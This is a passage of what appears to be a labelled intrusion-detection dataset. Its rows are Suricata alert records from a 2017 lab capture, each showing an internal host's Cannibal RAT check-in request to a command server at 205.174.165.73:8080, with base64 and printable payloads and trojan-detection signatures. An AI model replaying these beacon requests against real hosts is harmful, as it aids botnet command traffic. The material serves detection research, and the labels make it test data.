'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobzhAAIAGTejAqAoPza6lScxUH5DsFvynFd/w8FARAQCVsAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:27:32.604672+0000', 'flow_id': 585694158537272, 'pcap_cnt': 4512804, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52308, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:32.541240+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobzhAAIAGTejAqAoPza6lScxUH5DsFvynFd/w8FARAQCVsAAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,250,516 |
192.168.10.15-52309-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4512826, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:27:32 | 63,197 | Friday | [{'timestamp': '2017-07-07T13:27:32.679904+0000', 'flow_id': 424800388672512, 'pcap_cnt': 4512826, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52309, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:32.617472+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobz1AAIAGTePAqAoPza6lScxVH5B2iOxfanhtPlARAQBKnwAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:27:32.679904+0000', 'flow_id': 424800388672512, 'pcap_cnt': 4512826, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52309, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:32.617472+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobz1AAIAGTePAqAoPza6lScxVH5B2iOxfanhtPlARAQBKnwAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,250,517 |
192.168.10.9-2748-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4514053, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:27:38 | 74,038 | Friday | [{'timestamp': '2017-07-07T13:27:38.404642+0000', 'flow_id': 2087403704159773, 'pcap_cnt': 4514053, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2748, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:38.331293+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPgBAAIAGfybAqAoJza6lSQq8H5Bu2mv8T5JKTFARAQDSKAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:27:38.404642+0000', 'flow_id': 2087403704159773, 'pcap_cnt': 4514053, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2748, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:38.331293+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPgBAAIAGfybAqAoJza6lSQq8H5Bu2mv8T5JKTFARAQDSKAAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 308 | attack | 1,250,550 |
192.168.10.14-51608-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4514811, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:27:41 | 64,864 | Friday | [{'timestamp': '2017-07-07T13:27:41.096109+0000', 'flow_id': 1452324070194276, 'pcap_cnt': 4514811, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51608, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:41.031844+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGW1AAIAGo7TAqAoOza6lScmYH5BNaHUavaU6Z1ARAQDNbAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:27:41.096109+0000', 'flow_id': 1452324070194276, 'pcap_cnt': 4514811, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51608, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:41.031844+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGW1AAIAGo7TAqAoOza6lScmYH5BNaHUavaU6Z1ARAQDNbAAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,250,553 |
192.168.10.15-52310-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4514954, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:27:42 | 63,909 | Friday | [{'timestamp': '2017-07-07T13:27:42.671257+0000', 'flow_id': 511756297193320, 'pcap_cnt': 4514954, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52310, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:42.608104+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAob0JAAIAGTd7AqAoPza6lScxWH5DIaeWd7+oxOVARAQC2EQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:27:42.671257+0000', 'flow_id': 511756297193320, 'pcap_cnt': 4514954, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52310, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:42.608104+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAob0JAAIAGTd7AqAoPza6lScxWH5DIaeWd7+oxOVARAQC2EQAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,250,554 |
192.168.10.9-2749-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4515989, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:27:48 | 71,441 | Friday | [{'timestamp': '2017-07-07T13:27:48.479573+0000', 'flow_id': 1153424411606301, 'pcap_cnt': 4515989, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2749, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:27:48.408861+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPghAAIAGfx7AqAoJza6lSQq9H5AO1fnlNXuQU1ARAQB4UwAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:27:48.479573+0000', 'flow_id': 1153424411606301, 'pcap_cnt': 4515989, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2749, 'dest_ip': 